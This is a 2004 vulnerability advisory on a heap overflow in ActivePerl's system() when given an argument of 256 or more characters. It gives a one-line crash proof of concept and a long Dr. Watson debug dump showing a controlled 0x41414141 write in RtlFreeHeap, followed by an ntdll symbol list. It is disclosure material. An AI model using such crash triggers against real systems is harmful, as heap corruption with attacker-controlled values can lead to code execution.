ActiveState ActivePerl Buffer Overflow
=======================================
It seems that a argument >=256 chars given to system() crashes Perl.exe.
Versions:
=========
I only tested the versions v5.8.0 (built for MSWin32-x86-multi-thread)
and v5.8.3 (built for MSWin32-x86-multi-thread) on a Windows XP Professional SP1.
Other versions of ActivePerl might be also affected.
Exploiting:
===========
perl -e "$a="A" x 256; system($a)"
Vendor:
=======
www.activestate.com
Discovered:
===========
17.05.2004
http://www.oliverkarow.de/research/ActivePerlSystemBOF.txt
Debug-Info:
===========
Application exception occurred:
App: D:\Perl\bin\perl.exe (pid=908)
When: 5/17/2004 @ 22:08:24.579
Exception number: c0000005 (access violation)
*----> System Information <----*
Computer Name: dontcare
User Name: Oliver_Karow
Terminal Session Id: 0
Number of Processors: 1
Processor Type: x86 Family 6 Model 9 Stepping 5
Windows Version: 5.1
Current Build: 2600
Service Pack: 1
Current Type: Uniprocessor Free
Registered Organization: Nasi
Registered Owner: Norbert Nase
*----> Task List <----*
0 System Process
4 System
908 perl.exe
1088 drwtsn32.exe
*----> Module List <----*
(0000000000400000 - 0000000000405000: D:\Perl\bin\perl.exe
(0000000028000000 - 00000000280bc000: D:\Perl\bin\perl58.dll
(00000000629c0000 - 00000000629c8000: C:\WINDOWS\System32\LPK.DLL
(0000000072fa0000 - 0000000072ffa000: C:\WINDOWS\System32\USP10.dll
(0000000076390000 - 00000000763ac000: C:\WINDOWS\System32\IMM32.DLL
(0000000077c10000 - 0000000077c63000: C:\WINDOWS\system32\MSVCRT.dll
(0000000077d40000 - 0000000077dcc000: C:\WINDOWS\system32\USER32.dll
(0000000077dd0000 - 0000000077e5d000: C:\WINDOWS\system32\ADVAPI32.dll
(0000000077e60000 - 0000000077f46000: C:\WINDOWS\system32\kernel32.dll
(0000000077f50000 - 0000000077ff7000: C:\WINDOWS\System32\ntdll.dll
(0000000078000000 - 0000000078087000: C:\WINDOWS\system32\RPCRT4.dll
(000000007e090000 - 000000007e0d1000: C:\WINDOWS\system32\GDI32.dll
*----> State Dump for Thread Id 0x894 <----*
eax=0182adc8 ebx=00220178 ecx=0182bb90 edx=41414141 esi=0182adc0 edi=00220000
eip=77f58ddf esp=0140fb4c ebp=0140fc08 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000287
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\System32\ntdll.dll -
function: ntdll!RtlFreeHeap
77f58dc6 3b10 cmp edx,[eax]
77f58dc8 7604 jbe ntdll!RtlFreeHeap+0x390 (77f58dce)
77f58dca 8b09 mov ecx,[ecx]
77f58dcc ebe6 jmp ntdll!RtlFreeHeap+0x376 (77f58db4)
77f58dce 8d4608 lea eax,[esi+0x8]
77f58dd1 89458c mov [ebp-0x74],eax
77f58dd4 8b5104 mov edx,[ecx+0x4]
77f58dd7 895588 mov [ebp-0x78],edx
77f58dda 8908 mov [eax],ecx
77f58ddc 895004 mov [eax+0x4],edx
FAULT ->77f58ddf 8902 mov [edx],eax ds:0023:41414141=????????
77f58de1 894104 mov [ecx+0x4],eax
77f58de4 56 push esi
77f58de5 8b75e4 mov esi,[ebp-0x1c]
77f58de8 56 push esi
77f58de9 e850a20200 call ntdll!RtlZeroHeap+0x618 (77f8303e)
77f58dee 8b45cc mov eax,[ebp-0x34]
77f58df1 014628 add [esi+0x28],eax
77f58df4 e992000000 jmp ntdll!RtlFreeHeap+0x44d (77f58e8b)
77f58df9 50 push eax
77f58dfa 56 push esi
*----> Stack Back Trace <----*
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\MSVCRT.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
*** WARNING: Unable to verify checksum for D:\Perl\bin\perl58.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for D:\Perl\bin\perl58.dll -
*** WARNING: Unable to verify checksum for D:\Perl\bin\perl.exe
*** ERROR: Module load completed but symbols could not be loaded for D:\Perl\bin\perl.exe
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
ChildEBP RetAddr Args to Child
0140fc08 77c2ab2e 00220000 00000000 0182adc8 ntdll!RtlFreeHeap+0x3a1
0140fc50 280834b3 0182adc8 ffffffff 00223c48 MSVCRT!free+0xc3
0140fd3c 2808aaa1 00000000 01828764 0182add4 perl58!Perl_my_socketpair+0xed8
0140fd64 2808a9d8 01828764 0182864c 00000002 perl58!Perl_do_spawn+0xd8
0140fd9c 2805d784 00226678 00224064 28024499 perl58!Perl_do_spawn+0xf
0140fe24 280862de 00224064 77f944a8 00000007 perl58!Perl_runops_standard+0xc
0140ff3c 00401012 00000003 00223c10 00222bc8 perl58!RunPerl+0x86
0140ffc0 77e814c7 77f944a8 00000007 7ffdf000 perl+0x1012
0140fff0 00000000 00401016 00000000 00000000 kernel32!GetCurrentDirectoryW+0x44
*----> Raw Stack Dump <----*
000000000140fb4c 88 3f 22 00 c8 ad 82 01 - 00 00 00 00 41 00 41 00 .?".........A.A.
000000000140fb5c 41 00 41 00 41 00 41 00 - 41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
000000000140fb6c 41 00 41 00 41 00 41 00 - 41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
000000000140fb7c 41 00 41 00 41 00 41 00 - 41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
000000000140fb8c 41 00 41 00 41 41 41 41 - c8 ad 82 01 88 bb 82 01 A.A.AAAA........
000000000140fb9c 90 bb 82 01 78 01 22 00 - 00 ec fd 7f 1a 02 00 00 ....x.".........
000000000140fbac 90 f9 40 01 33 00 00 c0 - 00 00 00 00 c0 ad 82 01 ..@.3...........
000000000140fbbc 00 00 00 00 00 00 00 00 - 00 00 00 00 24 00 00 00 ............$...
000000000140fbcc 20 01 00 00 c4 fb 40 01 - 71 01 00 00 88 0b 00 00 .....@.q.......
000000000140fbdc f0 88 01 00 00 00 22 00 - 40 fb 40 01 7b 00 01 01 ......".@.@.{...
000000000140fbec 00 00 22 00 4c fb 40 01 - 74 f7 40 01 40 fc 40 01 ..".L.@.t.@.@.@.
000000000140fbfc f0 88 fa 77 88 1c f5 77 - 01 00 00 00 50 fc 40 01 ...w...w....P.@.
000000000140fc0c 2e ab c2 77 00 00 22 00 - 00 00 00 00 c8 ad 82 01 ...w..".........
000000000140fc1c 88 3f 22 00 c8 ad 82 01 - 00 00 00 00 4c fc 40 01 .?".........L.@.
000000000140fc2c 10 fc 40 01 00 01 00 00 - b0 ff 40 01 1c fc 40 01 ..@.......@...@.
000000000140fc3c 74 f7 40 01 b0 ff 40 01 - b0 3e c3 77 30 20 c1 77 t.@...@..>.w0 .w
000000000140fc4c ff ff ff ff 3c fd 40 01 - b3 34 08 28 c8 ad 82 01 ....<.@..4.(....
000000000140fc5c ff ff ff ff 48 3c 22 00 - c1 41 08 28 d4 ad 82 01 ....H<"..A.(....
000000000140fc6c 1d f8 07 28 4c 3c 22 00 - d4 ad 82 01 27 5c 08 28 ...(L<".....'\.(
000000000140fc7c d4 ad 82 01 09 45 08 28 - d4 ad 82 01 64 40 22 00 .....E.(....d@".
*----> Symbol Table <----*
C:\WINDOWS\System32\ntdll.dll
77f55434 ntdll!LdrDisableThreadCalloutsForDll
77f55662 ntdll!RtlNormalizeProcessParams
77f556e6 ntdll!RtlInitNlsTables
77f55710 ntdll!RtlInitCodePageTable
77f557d2 ntdll!RtlInitializeCriticalSection
77f55851 ntdll!RtlCreateHeap
77f56f1b ntdll!LdrLoadDll
77f5718e ntdll!LdrGetDllHandle
77f57bae ntdll!RtlAllocateHeap
77f58a3e ntdll!RtlFreeHeap
77f59726 ntdll!RtlLockHeap
77f597ea ntdll!RtlUnlockHeap
77f598a0 ntdll!RtlSetCurrentDirectory_U
77f59b30 ntdll!RtlDosPathNameToNtPathName_U
77f59b82 ntdll!RtlAcquirePebLock
77f59bea ntdll!RtlReleasePebLock
77f5a5dc ntdll!RtlDetermineDosPathNameType_U
77f5a772 ntdll!RtlAnsiStringToUnicodeString
77f5a838 ntdll!RtlMultiByteToUnicodeN
77f5ab20 ntdll!RtlUnicodeStringToAnsiString
77f5abe4 ntdll!RtlUnicodeToMultiByteN
77f5ad7e ntdll!RtlFreeUnicodeString
77f5ad7e ntdll!RtlFreeAnsiString
77f5ad9a ntdll!RtlFreeOemString
77f5adb0 ntdll!RtlOemStringToUnicodeString
77f5ae5c ntdll!RtlOemToUnicodeN
77f5b042 ntdll!RtlUnicodeStringToOemString
77f5b0ea ntdll!RtlUnicodeToOemN
77f5b2a0 ntdll!RtlEnterCriticalSection
77f5b380 ntdll!RtlLeaveCriticalSection
77f5b3b8 ntdll!RtlTryEnterCriticalSection
77f5b408 ntdll!LdrInitializeThunk
77f5b438 ntdll!ZwAcceptConnectPort
77f5b438 ntdll!NtAcceptConnectPort
77f5b448 ntdll!ZwAccessCheck
77f5b448 ntdll!NtAccessCheck
77f5b458 ntdll!NtAccessCheckAndAuditAlarm
77f5b458 ntdll!ZwAccessCheckAndAuditAlarm
77f5b468 ntdll!ZwAccessCheckByType
77f5b468 ntdll!NtAccessCheckByType
77f5b478 ntdll!NtAccessCheckByTypeAndAuditAlarm
77f5b478 ntdll!ZwAccessCheckByTypeAndAuditAlarm
77f5b488 ntdll!ZwAccessCheckByTypeResultList
77f5b488 ntdll!NtAccessCheckByTypeResultList
77f5b498 ntdll!ZwAccessCheckByTypeResultListAndAuditAlarm
77f5b498 ntdll!NtAccessCheckByTypeResultListAndAuditAlarm
77f5b4a8 ntdll!ZwAccessCheckByTypeResultListAndAuditAlarmByHandle
77f5b4a8 ntdll!NtAccessCheckByTypeResultListAndAuditAlarmByHandle
77f5b4b8 ntdll!NtAddAtom
77f5b4b8 ntdll!ZwAddAtom
77f5b4c8 ntdll!NtAddBootEntry
77f5b4c8 ntdll!ZwAddBootEntry
77f5b4d8 ntdll!NtAdjustGroupsToken
77f5b4d8 ntdll!ZwAdjustGroupsToken
77f5b4e8 ntdll!ZwAdjustPrivilegesToken
77f5b4e8 ntdll!NtAdjustPrivilegesToken
77f5b4f8 ntdll!ZwAlertResumeThread
77f5b4f8 ntdll!NtAlertResumeThread
77f5b508 ntdll!NtAlertThread
77f5b508 ntdll!ZwAlertThread
77f5b518 ntdll!NtAllocateLocallyUniqueId
77f5b518 ntdll!ZwAllocateLocallyUniqueId
77f5b528 ntdll!NtAllocateUserPhysicalPages
77f5b528 ntdll!ZwAllocateUserPhysicalPages
77f5b538 ntdll!ZwAllocateUuids
77f5b538 ntdll!NtAllocateUuids
77f5b548 ntdll!ZwAllocateVirtualMemory
77f5b548 ntdll!NtAllocateVirtualMemory
77f5b558 ntdll!ZwAreMappedFilesTheSame
77f5b558 ntdll!NtAreMappedFilesTheSame
77f5b568 ntdll!NtAssignProcessToJobObject
77f5b568 ntdll!ZwAssignProcessToJobObject
77f5b578 ntdll!ZwCallbackReturn
77f5b578 ntdll!NtCallbackReturn
77f5b588 ntdll!ZwCancelDeviceWakeupRequest
77f5b588 ntdll!NtCancelDeviceWakeupRequest
77f5b598 ntdll!ZwCancelIoFile
77f5b598 ntdll!NtCancelIoFile
77f5b5a8 ntdll!ZwCancelTimer
77f5b5a8 ntdll!NtCancelTimer
77f5b5b8 ntdll!ZwClearEvent
77f5b5b8 ntdll!NtClearEvent
77f5b5c8 ntdll!ZwClose
77f5b5c8 ntdll!NtClose
77f5b5d8 ntdll!ZwCloseObjectAuditAlarm
77f5b5d8 ntdll!NtCloseObjectAuditAlarm
77f5b5e8 ntdll!ZwCompactKeys
77f5b5e8 ntdll!NtCompactKeys
77f5b5f8 ntdll!ZwCompareTokens
77f5b5f8 ntdll!NtCompareTokens
77f5b608 ntdll!ZwCompleteConnectPort
77f5b608 ntdll!NtCompleteConnectPort
77f5b618 ntdll!NtCompressKey
77f5b618 ntdll!ZwCompressKey
77f5b628 ntdll!NtConnectPort
77f5b628 ntdll!ZwConnectPort
77f5b638 ntdll!ZwContinue
77f5b638 ntdll!NtContinue
77f5b648 ntdll!ZwCreateDebugObject
77f5b648 ntdll!NtCreateDebugObject
77f5b658 ntdll!NtCreateDirectoryObject
77f5b658 ntdll!ZwCreateDirectoryObject
77f5b668 ntdll!NtCreateEvent
77f5b668 ntdll!ZwCreateEvent
77f5b678 ntdll!NtCreateEventPair
77f5b678 ntdll!ZwCreateEventPair
77f5b688 ntdll!ZwCreateFile
77f5b688 ntdll!NtCreateFile
77f5b698 ntdll!ZwCreateIoCompletion
77f5b698 ntdll!NtCreateIoCompletion
77f5b6a8 ntdll!ZwCreateJobObject
77f5b6a8 ntdll!NtCreateJobObject
77f5b6b8 ntdll!NtCreateJobSet
77f5b6b8 ntdll!ZwCreateJobSet
77f5b6c8 ntdll!NtCreateKey
77f5b6c8 ntdll!ZwCreateKey
77f5b6d8 ntdll!ZwCreateMailslotFile
77f5b6d8 ntdll!NtCreateMailslotFile
77f5b6e8 ntdll!NtCreateMutant
77f5b6e8 ntdll!ZwCreateMutant
77f5b6f8 ntdll!NtCreateNamedPipeFile
77f5b6f8 ntdll!ZwCreateNamedPipeFile
77f5b708 ntdll!ZwCreatePagingFile
77f5b708 ntdll!NtCreatePagingFile
77f5b718 ntdll!ZwCreatePort
77f5b718 ntdll!NtCreatePort
77f5b728 ntdll!ZwCreateProcess
77f5b728 ntdll!NtCreateProcess
77f5b738 ntdll!ZwCreateProcessEx
77f5b738 ntdll!NtCreateProcessEx
77f5b748 ntdll!ZwCreateProfile
77f5b748 ntdll!NtCreateProfile
77f5b758 ntdll!NtCreateSection
77f5b758 ntdll!ZwCreateSection
77f5b768 ntdll!ZwCreateSemaphore
77f5b768 ntdll!NtCreateSemaphore
77f5b778 ntdll!ZwCreateSymbolicLinkObject
77f5b778 ntdll!NtCreateSymbolicLinkObject
77f5b788 ntdll!NtCreateThread
77f5b788 ntdll!ZwCreateThread
77f5b798 ntdll!NtCreateTimer
77f5b798 ntdll!ZwCreateTimer
77f5b7a8 ntdll!NtCreateToken
77f5b7a8 ntdll!ZwCreateToken
77f5b7b8 ntdll!ZwCreateWaitablePort
77f5b7b8 ntdll!NtCreateWaitablePort
77f5b7c8 ntdll!NtDebugActiveProcess
77f5b7c8 ntdll!ZwDebugActiveProcess
77f5b7d8 ntdll!ZwDebugContinue
77f5b7d8 ntdll!NtDebugContinue
77f5b7e8 ntdll!NtDelayExecution
77f5b7e8 ntdll!ZwDelayExecution
77f5b7f8 ntdll!ZwDeleteAtom
77f5b7f8 ntdll!NtDeleteAtom
77f5b808 ntdll!NtDeleteBootEntry
77f5b808 ntdll!ZwDeleteBootEntry
77f5b818 ntdll!NtDeleteFile
77f5b818 ntdll!ZwDeleteFile
77f5b828 ntdll!NtDeleteKey
77f5b828 ntdll!ZwDeleteKey
77f5b838 ntdll!NtDeleteObjectAuditAlarm
77f5b838 ntdll!ZwDeleteObjectAuditAlarm
77f5b848 ntdll!NtDeleteValueKey
77f5b848 ntdll!ZwDeleteValueKey
77f5b858 ntdll!NtDeviceIoControlFile
77f5b858 ntdll!ZwDeviceIoControlFile
77f5b868 ntdll!NtDisplayString
77f5b868 ntdll!ZwDisplayString
77f5b878 ntdll!ZwDuplicateObject
77f5b878 ntdll!NtDuplicateObject
77f5b888 ntdll!NtDuplicateToken
77f5b888 ntdll!ZwDuplicateToken
77f5b898 ntdll!NtEnumerateBootEntries
77f5b898 ntdll!ZwEnumerateBootEntries
77f5b8a8 ntdll!NtEnumerateKey
77f5b8a8 ntdll!ZwEnumerateKey
77f5b8b8 ntdll!NtEnumerateSystemEnvironmentValuesEx
77f5b8b8 ntdll!ZwEnumerateSystemEnvironmentValuesEx
77f5b8c8 ntdll!ZwEnumerateValueKey
77f5b8c8 ntdll!NtEnumerateValueKey
77f5b8d8 ntdll!ZwExtendSection
77f5b8d8 ntdll!NtExtendSection
77f5b8e8 ntdll!ZwFilterToken
77f5b8e8 ntdll!NtFilterToken
77f5b8f8 ntdll!NtFindAtom
77f5b8f8 ntdll!ZwFindAtom
77f5b908 ntdll!NtFlushBuffersFile
77f5b908 ntdll!ZwFlushBuffersFile
77f5b918 ntdll!ZwFlushInstructionCache
77f5b918 ntdll!NtFlushInstructionCache
77f5b928 ntdll!ZwFlushKey
77f5b928 ntdll!NtFlushKey
77f5b938 ntdll!ZwFlushVirtualMemory
77f5b938 ntdll!NtFlushVirtualMemory
77f5b948 ntdll!NtFlushWriteBuffer
77f5b948 ntdll!ZwFlushWriteBuffer
77f5b958 ntdll!ZwFreeUserPhysicalPages
77f5b958 ntdll!NtFreeUserPhysicalPages
77f5b968 ntdll!NtFreeVirtualMemory
77f5b968 ntdll!ZwFreeVirtualMemory
77f5b978 ntdll!NtFsControlFile
77f5b978 ntdll!ZwFsControlFile
77f5b988 ntdll!NtGetContextThread
77f5b988 ntdll!ZwGetContextThread
77f5b998 ntdll!ZwGetDevicePowerState
77f5b998 ntdll!NtGetDevicePowerState
77f5b9a8 ntdll!ZwGetPlugPlayEvent
77f5b9a8 ntdll!NtGetPlugPlayEvent
77f5b9b8 ntdll!ZwGetWriteWatch
77f5b9b8 ntdll!NtGetWriteWatch
77f5b9c8 ntdll!ZwImpersonateAnonymousToken
77f5b9c8 ntdll!NtImpersonateAnonymousToken
77f5b9d8 ntdll!ZwImpersonateClientOfPort
77f5b9d8 ntdll!NtImpersonateClientOfPort
77f5b9e8 ntdll!NtImpersonateThread
77f5b9e8 ntdll!ZwImpersonateThread
77f5b9f8 ntdll!ZwInitializeRegistry
77f5b9f8 ntdll!NtInitializeRegistry
77f5ba08 ntdll!ZwInitiatePowerAction
77f5ba08 ntdll!NtInitiatePowerAction
77f5ba18 ntdll!NtIsProcessInJob
77f5ba18 ntdll!ZwIsProcessInJob
77f5ba28 ntdll!ZwIsSystemResumeAutomatic
77f5ba28 ntdll!NtIsSystemResumeAutomatic
77f5ba38 ntdll!ZwListenPort
77f5ba38 ntdll!NtListenPort
77f5ba48 ntdll!ZwLoadDriver
77f5ba48 ntdll!NtLoadDriver
77f5ba58 ntdll!NtLoadKey
77f5ba58 ntdll!ZwLoadKey
77f5ba68 ntdll!NtLoadKey2
77f5ba68 ntdll!ZwLoadKey2
77f5ba78 ntdll!ZwLockFile
77f5ba78 ntdll!NtLockFile
77f5ba88 ntdll!NtLockProductActivationKeys
77f5ba88 ntdll!ZwLockProductActivationKeys
77f5ba98 ntdll!NtLockRegistryKey
77f5ba98 ntdll!ZwLockRegistryKey
77f5baa8 ntdll!ZwLockVirtualMemory
77f5baa8 ntdll!NtLockVirtualMemory
77f5bab8 ntdll!ZwMakePermanentObject
77f5bab8 ntdll!NtMakePermanentObject
77f5bac8 ntdll!ZwMakeTemporaryObject
77f5bac8 ntdll!NtMakeTemporaryObject
77f5bad8 ntdll!ZwMapUserPhysicalPages
77f5bad8 ntdll!NtMapUserPhysicalPages
77f5bae8 ntdll!NtMapUserPhysicalPagesScatter
77f5bae8 ntdll!ZwMapUserPhysicalPagesScatter
77f5baf8 ntdll!ZwMapViewOfSection
77f5baf8 ntdll!NtMapViewOfSection
77f5bb08 ntdll!ZwModifyBootEntry
77f5bb08 ntdll!NtModifyBootEntry
77f5bb18 ntdll!NtNotifyChangeDirectoryFile
77f5bb18 ntdll!ZwNotifyChangeDirectoryFile
77f5bb28 ntdll!NtNotifyChangeKey
77f5bb28 ntdll!ZwNotifyChangeKey
77f5bb38 ntdll!ZwNotifyChangeMultipleKeys
77f5bb38 ntdll!NtNotifyChangeMultipleKeys
77f5bb48 ntdll!ZwOpenDirectoryObject
77f5bb48 ntdll!NtOpenDirectoryObject
77f5bb58 ntdll!ZwOpenEvent
77f5bb58 ntdll!NtOpenEvent
77f5bb68 ntdll!ZwOpenEventPair
77f5bb68 ntdll!NtOpenEventPair
77f5bb78 ntdll!ZwOpenFile
77f5bb78 ntdll!NtOpenFile
77f5bb88 ntdll!ZwOpenIoCompletion
77f5bb88 ntdll!NtOpenIoCompletion
77f5bb98 ntdll!ZwOpenJobObject
77f5bb98 ntdll!NtOpenJobObject
77f5bba8 ntdll!ZwOpenKey
77f5bba8 ntdll!NtOpenKey
77f5bbb8 ntdll!NtOpenMutant
77f5bbb8 ntdll!ZwOpenMutant
77f5bbc8 ntdll!ZwOpenObjectAuditAlarm
77f5bbc8 ntdll!NtOpenObjectAuditAlarm
77f5bbd8 ntdll!ZwOpenProcess
77f5bbd8 ntdll!NtOpenProcess
77f5bbe8 ntdll!ZwOpenProcessToken
77f5bbe8 ntdll!NtOpenProcessToken
77f5bbf8 ntdll!ZwOpenProcessTokenEx
77f5bbf8 ntdll!NtOpenProcessTokenEx
77f5bc08 ntdll!ZwOpenSection
77f5bc08 ntdll!NtOpenSection
77f5bc18 ntdll!ZwOpenSemaphore
77f5bc18 ntdll!NtOpenSemaphore
77f5bc28 ntdll!ZwOpenSymbolicLinkObject
77f5bc28 ntdll!NtOpenSymbolicLinkObject
77f5bc38 ntdll!ZwOpenThread
77f5bc38 ntdll!NtOpenThread
77f5bc48 ntdll!ZwOpenThreadToken
77f5bc48 ntdll!NtOpenThreadToken
77f5bc58 ntdll!NtOpenThreadTokenEx
77f5bc58 ntdll!ZwOpenThreadTokenEx
77f5bc68 ntdll!ZwOpenTimer
77f5bc68 ntdll!NtOpenTimer
77f5bc78 ntdll!NtPlugPlayControl
77f5bc78 ntdll!ZwPlugPlayControl
77f5bc88 ntdll!ZwPowerInformation
77f5bc88 ntdll!NtPowerInformation
77f5bc98 ntdll!ZwPrivilegeCheck
77f5bc98 ntdll!NtPrivilegeCheck
77f5bca8 ntdll!NtPrivilegeObjectAuditAlarm
77f5bca8 ntdll!ZwPrivilegeObjectAuditAlarm
77f5bcb8 ntdll!NtPrivilegedServiceAuditAlarm
77f5bcb8 ntdll!ZwPrivilegedServiceAuditAlarm
77f5bcc8 ntdll!NtProtectVirtualMemory
77f5bcc8 ntdll!ZwProtectVirtualMemory
77f5bcd8 ntdll!NtPulseEvent
77f5bcd8 ntdll!ZwPulseEvent
77f5bce8 ntdll!NtQueryAttributesFile
77f5bce8 ntdll!ZwQueryAttributesFile
77f5bcf8 ntdll!ZwQueryBootEntryOrder
77f5bcf8 ntdll!NtQueryBootEntryOrder
77f5bd08 ntdll!NtQueryBootOptions
77f5bd08 ntdll!ZwQueryBootOptions
77f5bd18 ntdll!ZwQueryDebugFilterState
77f5bd18 ntdll!NtQueryDebugFilterState
77f5bd28 ntdll!ZwQueryDefaultLocale
77f5bd28 ntdll!NtQueryDefaultLocale
77f5bd38 ntdll!NtQueryDefaultUILanguage
77f5bd38 ntdll!ZwQueryDefaultUILanguage
77f5bd48 ntdll!ZwQueryDirectoryFile
77f5bd48 ntdll!NtQueryDirectoryFile
77f5bd58 ntdll!NtQueryDirectoryObject
77f5bd58 ntdll!ZwQueryDirectoryObject
77f5bd68 ntdll!NtQueryEaFile
77f5bd68 ntdll!ZwQueryEaFile
77f5bd78 ntdll!ZwQueryEvent
77f5bd78 ntdll!NtQueryEvent
77f5bd88 ntdll!ZwQueryFullAttributesFile
77f5bd88 ntdll!NtQueryFullAttributesFile
77f5bd98 ntdll!NtQueryInformationAtom
77f5bd98 ntdll!ZwQueryInformationAtom
77f5bda8 ntdll!NtQueryInformationFile
77f5bda8 ntdll!ZwQueryInformationFile
77f5bdb8 ntdll!NtQueryInformationJobObject
77f5bdb8 ntdll!ZwQueryInformationJobObject
77f5bdc8 ntdll!NtQueryInformationPort
77f5bdc8 ntdll!ZwQueryInformationPort
77f5bdd8 ntdll!NtQueryInformationProcess
77f5bdd8 ntdll!ZwQueryInformationProcess
77f5bde8 ntdll!NtQueryInformationThread
77f5bde8 ntdll!ZwQueryInformationThread
77f5bdf8 ntdll!NtQueryInformationToken
77f5bdf8 ntdll!ZwQueryInformationToken
77f5be08 ntdll!ZwQueryInstallUILanguage
77f5be08 ntdll!NtQueryInstallUILanguage
77f5be18 ntdll!ZwQueryIntervalProfile
77f5be18 ntdll!NtQueryIntervalProfile
77f5be28 ntdll!ZwQueryIoCompletion
77f5be28 ntdll!NtQueryIoCompletion
77f5be38 ntdll!ZwQueryKey
77f5be38 ntdll!NtQueryKey
77f5be48 ntdll!NtQueryMultipleValueKey
77f5be48 ntdll!ZwQueryMultipleValueKey
77f5be58 ntdll!NtQueryMutant
77f5be58 ntdll!ZwQueryMutant
77f5be68 ntdll!ZwQueryObject
77f5be68 ntdll!NtQueryObject
77f5be78 ntdll!NtQueryOpenSubKeys
77f5be78 ntdll!ZwQueryOpenSubKeys
77f5be88 ntdll!ZwQueryPerformanceCounter
77f5be88 ntdll!NtQueryPerformanceCounter
77f5be98 ntdll!NtQueryQuotaInformationFile
77f5be98 ntdll!ZwQueryQuotaInformationFile
77f5bea8 ntdll!NtQuerySection
77f5bea8 ntdll!ZwQuerySection
77f5beb8 ntdll!NtQuerySecurityObject
77f5beb8 ntdll!ZwQuerySecurityObject
77f5bec8 ntdll!ZwQuerySemaphore
77f5bec8 ntdll!NtQuerySemaphore
77f5bed8 ntdll!ZwQuerySymbolicLinkObject
77f5bed8 ntdll!NtQuerySymbolicLinkObject
77f5bee8 ntdll!NtQuerySystemEnvironmentValue
77f5bee8 ntdll!ZwQuerySystemEnvironmentValue
77f5bef8 ntdll!ZwQuerySystemEnvironmentValueEx
77f5bef8 ntdll!NtQuerySystemEnvironmentValueEx
77f5bf08 ntdll!RtlGetNativeSystemInformation
77f5bf08 ntdll!ZwQuerySystemInformation
77f5bf08 ntdll!NtQuerySystemInformation
77f5bf18 ntdll!NtQuerySystemTime
77f5bf18 ntdll!ZwQuerySystemTime
77f5bf28 ntdll!ZwQueryTimer
77f5bf28 ntdll!NtQueryTimer
77f5bf38 ntdll!ZwQueryTimerResolution
77f5bf38 ntdll!NtQueryTimerResolution
77f5bf48 ntdll!ZwQueryValueKey
77f5bf48 ntdll!NtQueryValueKey
77f5bf58 ntdll!NtQueryVirtualMemory
77f5bf58 ntdll!ZwQueryVirtualMemory
77f5bf68 ntdll!NtQueryVolumeInformationFile
77f5bf68 ntdll!ZwQueryVolumeInformationFile
77f5bf78 ntdll!NtQueueApcThread
77f5bf78 ntdll!ZwQueueApcThread
77f5bf88 ntdll!NtRaiseException
77f5bf88 ntdll!ZwRaiseException
77f5bf98 ntdll!ZwRaiseHardError
77f5bf98 ntdll!NtRaiseHardError
77f5bfa8 ntdll!ZwReadFile
77f5bfa8 ntdll!NtReadFile
77f5bfb8 ntdll!ZwReadFileScatter
77f5bfb8 ntdll!NtReadFileScatter
77f5bfc8 ntdll!NtReadRequestData
77f5bfc8 ntdll!ZwReadRequestData
77f5bfd8 ntdll!NtReadVirtualMemory
77f5bfd8 ntdll!ZwReadVirtualMemory
77f5bfe8 ntdll!ZwRegisterThreadTerminatePort
77f5bfe8 ntdll!NtRegisterThreadTerminatePort
77f5bff8 ntdll!NtReleaseMutant
77f5bff8 ntdll!ZwReleaseMutant
77f5c008 ntdll!ZwReleaseSemaphore
77f5c008 ntdll!NtReleaseSemaphore
77f5c018 ntdll!NtRemoveIoCompletion
77f5c018 ntdll!ZwRemoveIoCompletion
77f5c028 ntdll!NtRemoveProcessDebug
77f5c028 ntdll!ZwRemoveProcessDebug
77f5c038 ntdll!NtRenameKey
77f5c038 ntdll!ZwRenameKey
77f5c048 ntdll!ZwReplaceKey
77f5c048 ntdll!NtReplaceKey
77f5c058 ntdll!ZwReplyPort
77f5c058 ntdll!NtReplyPort
77f5c068 ntdll!NtReplyWaitReceivePort
77f5c068 ntdll!ZwReplyWaitReceivePort
77f5c078 ntdll!ZwReplyWaitReceivePortEx
77f5c078 ntdll!NtReplyWaitReceivePortEx
77f5c088 ntdll!NtReplyWaitReplyPort
77f5c088 ntdll!ZwReplyWaitReplyPort
77f5c098 ntdll!ZwRequestDeviceWakeup
77f5c098 ntdll!NtRequestDeviceWakeup
77f5c0a8 ntdll!NtRequestPort
77f5c0a8 ntdll!ZwRequestPort
77f5c0b8 ntdll!NtRequestWaitReplyPort
77f5c0b8 ntdll!ZwRequestWaitReplyPort
77f5c0c8 ntdll!NtRequestWakeupLatency
77f5c0c8 ntdll!ZwRequestWakeupLatency
77f5c0d8 ntdll!NtResetEvent
77f5c0d8 ntdll!ZwResetEvent
77f5c0e8 ntdll!ZwResetWriteWatch
77f5c0e8 ntdll!NtResetWriteWatch
77f5c0f8 ntdll!NtRestoreKey
77f5c0f8 ntdll!ZwRestoreKey
77f5c108 ntdll!ZwResumeProcess
77f5c108 ntdll!NtResumeProcess
77f5c118 ntdll!NtResumeThread
77f5c118 ntdll!ZwResumeThread
77f5c128 ntdll!ZwSaveKey
77f5c128 ntdll!NtSaveKey
77f5c138 ntdll!NtSaveKeyEx
77f5c138 ntdll!ZwSaveKeyEx
77f5c148 ntdll!NtSaveMergedKeys
77f5c148 ntdll!ZwSaveMergedKeys
77f5c158 ntdll!NtSecureConnectPort
77f5c158 ntdll!ZwSecureConnectPort
77f5c168 ntdll!ZwSetBootEntryOrder
77f5c168 ntdll!NtSetBootEntryOrder
77f5c178 ntdll!ZwSetBootOptions
77f5c178 ntdll!NtSetBootOptions
77f5c188 ntdll!ZwSetContextThread
77f5c188 ntdll!NtSetContextThread
77f5c198 ntdll!ZwSetDebugFilterState
77f5c198 ntdll!NtSetDebugFilterState
77f5c1a8 ntdll!NtSetDefaultHardErrorPort
77f5c1a8 ntdll!ZwSetDefaultHardErrorPort
77f5c1b8 ntdll!NtSetDefaultLocale
77f5c1b8 ntdll!ZwSetDefaultLocale
77f5c1c8 ntdll!NtSetDefaultUILanguage
77f5c1c8 ntdll!ZwSetDefaultUILanguage
77f5c1d8 ntdll!ZwSetEaFile
77f5c1d8 ntdll!NtSetEaFile
